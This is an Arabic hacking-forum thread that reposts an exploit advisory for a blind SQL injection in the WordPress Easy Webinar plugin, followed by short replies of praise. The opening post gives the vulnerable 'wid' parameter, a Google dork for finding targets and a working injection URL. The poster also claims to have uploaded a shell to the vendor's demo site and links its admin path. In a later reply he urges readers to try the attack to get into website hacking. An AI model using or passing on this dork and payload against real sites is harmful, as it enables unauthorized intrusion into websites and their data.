Follow us on Twitter Follow us on Facebook Watch us on YouTube





العودة   development-point > [ أقسام حماية واختراق المواقع والسيرفرات ] > قسم اختراق المواقع والسيرفرات > قسم الثغـرات

الملاحظات


Wordpress Easy Webinar Plugin Blind SQL

# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability # Vendor Homepage: www.easywebinarplugin.com # Date: 10/26/2012 # Author: Robert Cooper (robert.cooper areyousecure.net)

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم منذ /11-29-2012, 06:37 PM   #1
Mr iNFiNiTi
Creator

الصورة الرمزية Mr iNFiNiTi

Mr iNFiNiTi غير متواجد حالياً

 رقم العضوية : 149
 تاريخ التسجيل : Nov 2012
 العمر : 34
 الجنس : ~ ذكر
 البلد : SauDi
 المشاركات : 94
 إهتمامك : Hacking
 النقاط : 23
 قوة التقييم : Mr iNFiNiTi is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي Wordpress Easy Webinar Plugin Blind SQL

كود:
# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability 
# Vendor Homepage: www.easywebinarplugin.com
 
# Date: 10/26/2012
 
# Author: Robert Cooper (robert.cooper [at] areyousecure.net)
 
# Tested on: [Linux/Windows 7]
 
#Vulnerable Parameters: wid=
 
 
# Google Dork: allinurl: get-widget.php?wid=
 
##############################################################
Exploit: www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi] Note: The HTTP response will read 404, but this is false: www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x This will result in the page loading correctly and show that the plugin is vulnerable to injection (string). ############################################################## www.areyousecure.net # Shouts to the Belegit crew

شل على موقع الاضافة من رفعي Wordpress Easy Webinar Plugin Blind SQL SnipeR (29).gif

http://demo.easywebinarplugin.com/wp...n/webadmin.php

المصدر: development-point - للمزيد تابع : قسم الثغـرات


Wordpress Easy Webinar Plugin Blind SQL






  رد مع اقتباس
قديم منذ /11-29-2012, 06:59 PM   #2
DHooMi1000
سبحان الله وبحمده سبحان الله العظيم

الصورة الرمزية DHooMi1000

DHooMi1000 غير متواجد حالياً

 رقم العضوية : 77
 تاريخ التسجيل : Oct 2012
 الجنس : ~ ذكر
 البلد : في جهآزك
 المشاركات : 927
 النقاط : 82
 قوة التقييم : DHooMi1000 will become famous soon enough

شكراً: 0
تم شكره 2 مرة في 2 مشاركة
افتراضي رد: Wordpress Easy Webinar Plugin Blind SQL

مآشآء آلله

آبدآع والله

الله يعطيك الف الف الف عافيهه آإخخوي =) ...


تقبل مروريَ يَ بطلَ =) ...






  رد مع اقتباس
قديم منذ /11-29-2012, 07:12 PM   #3
Mr iNFiNiTi
Creator

الصورة الرمزية Mr iNFiNiTi

Mr iNFiNiTi غير متواجد حالياً

 رقم العضوية : 149
 تاريخ التسجيل : Nov 2012
 العمر : 34
 الجنس : ~ ذكر
 البلد : SauDi
 المشاركات : 94
 إهتمامك : Hacking
 النقاط : 23
 قوة التقييم : Mr iNFiNiTi is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: Wordpress Easy Webinar Plugin Blind SQL

^^
الله يحييك قسم بالله منور الموضوع






  رد مع اقتباس
قديم منذ /11-29-2012, 07:33 PM   #4
SnipeR
V.I.P

الصورة الرمزية SnipeR

SnipeR غير متواجد حالياً

 رقم العضوية : 5
 تاريخ التسجيل : Oct 2012
 الجنس : ~ ذكر
 المشاركات : 382
 النقاط : 39
 قوة التقييم : SnipeR is on a distinguished road

شكراً: 3
تم شكره مرة واحدة في مشاركة واحدة
افتراضي رد: Wordpress Easy Webinar Plugin Blind SQL

بارك الله فيك
شكرا لك






  رد مع اقتباس
قديم منذ /11-29-2012, 11:58 PM   #5
yousif zozo
Very Excellent

الصورة الرمزية yousif zozo

yousif zozo غير متواجد حالياً

 رقم العضوية : 194
 تاريخ التسجيل : Nov 2012
 الجنس : ~ ذكر
 المشاركات : 121
 النقاط : 92
 قوة التقييم : yousif zozo will become famous soon enough

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: Wordpress Easy Webinar Plugin Blind SQL

ماشاء الله

ثغرة جميلة انشالله تتم الاستفادة منها مع اني ليس لي خبرة كبيرة في المواقع






  رد مع اقتباس
قديم منذ /11-30-2012, 03:03 AM   #6
Mr iNFiNiTi
Creator

الصورة الرمزية Mr iNFiNiTi

Mr iNFiNiTi غير متواجد حالياً

 رقم العضوية : 149
 تاريخ التسجيل : Nov 2012
 العمر : 34
 الجنس : ~ ذكر
 البلد : SauDi
 المشاركات : 94
 إهتمامك : Hacking
 النقاط : 23
 قوة التقييم : Mr iNFiNiTi is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: Wordpress Easy Webinar Plugin Blind SQL

حاول تطبيقها انشاء الله راح تدخل عالم اختراق المواقع
الله يعطيكم العافيه على المرور كلياتكن






  رد مع اقتباس
قديم منذ /12-03-2012, 08:50 PM   #7
slo00om
Creator

الصورة الرمزية slo00om

slo00om غير متواجد حالياً

 رقم العضوية : 36
 تاريخ التسجيل : Oct 2012
 الجنس : ~ ذكر
 البلد : آلَآمِآرآتُ
 المشاركات : 123
 إهتمامك : الآختراق
 النقاط : 12
 قوة التقييم : slo00om is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: Wordpress Easy Webinar Plugin Blind SQL

الله يعطيك الف عافية مع اني ما اعرف اخترق مواقع
تسسلم
ان شا الله اتعلم






  رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

جديد قسم الثغـرات


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه للموضوع: Wordpress Easy Webinar Plugin Blind SQL
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
رفع شل على لوحه تحكم wordpress انس العوادي قسم اختراق المواقع والسيرفرات 15 09-04-2013 06:25 PM
ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities MhWy قسم الثغـرات 10 09-02-2013 02:21 AM
تخمين WordPress باستخدام مشروع Metasploit SnipeR قسم توزيعات أختبار الأخترآق المتقدم 1 08-30-2013 02:44 PM
حصريا Easy Driver Pro 8.0.3 ‏windows 8 الأرشيف 0 11-04-2012 07:40 PM
برنامج تغيير الاي بيHide IP Easy ,الشرح التفصيلى لعملاق تغيير الايبى Hide IP Easy v5.2.0.6 Final aaqassam جديد البرامج والتطبيقات 2 11-01-2012 07:08 PM


الساعة الآن 09:05 PM

 



Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
development-point